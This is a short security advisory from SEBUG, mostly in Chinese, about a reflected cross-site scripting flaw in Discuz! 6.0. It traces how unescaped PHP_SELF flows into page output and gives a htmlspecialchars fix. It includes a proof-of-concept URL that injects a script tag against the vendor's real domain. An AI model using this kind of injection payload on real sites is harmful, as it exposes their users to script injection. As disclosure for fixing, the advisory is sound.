Discuz! 6.0
Discuz! "$_SERVER['PHP_SELF']" XSS Vulnerability
SEBUG-ID:2748
SEBUG-Appdir:Discuz!
Published:2008-01-01
Vulnerable:
Discription:
在common.inc.php文件的69行:
$PHP_SELF = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
$SCRIPT_FILENAME = str_replace('\\\\', '/', (isset($_SERVER['PATH_TRANSLATED']) ? $_SERVER['PATH_TRANSLATED'] : $_SERVER['SCRIPT_FILENAME']));
$boardurl = 'http://'.$_SERVER['HTTP_HOST'].preg_replace("/\/+(api|archiver|wap)?\/*$/i", '', substr($PHP_SELF, 0, strrpos($PHP_SELF, '/'))).'/';
取得$_SERVER['PHP_SELF']的最后一个/前的字符串后直接拼入了$boardurl,没做其他处理
在index.php文件的49行:
$rssstatus && $rsshead = '<link rel="alternate" type="application/rss+xml" title="'.$bbname.'" href="'.$boardurl.'rss.php?auth='.$rssauth.'">';
这里调用了$boardurl,
在header.htm中的12行:
<link rel="archives" title="$bbname" href="{$boardurl}archiver/">
$rsshead
这里调输出了$boardurl,同时还有$rsshead,
Exploit:
[www.sebug.net]
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
利用方式:
http://www.discuz.net/index.php/%22%3E%3Cscript%3Ealert('lib3rt3')%3C/script%3E/
SEBUG Solution:
解决方法: $PHP_SELF = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME']; 改为: $PHP_SELF = htmlspecialchars($_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME']);
// sebug.net [2008-01-01]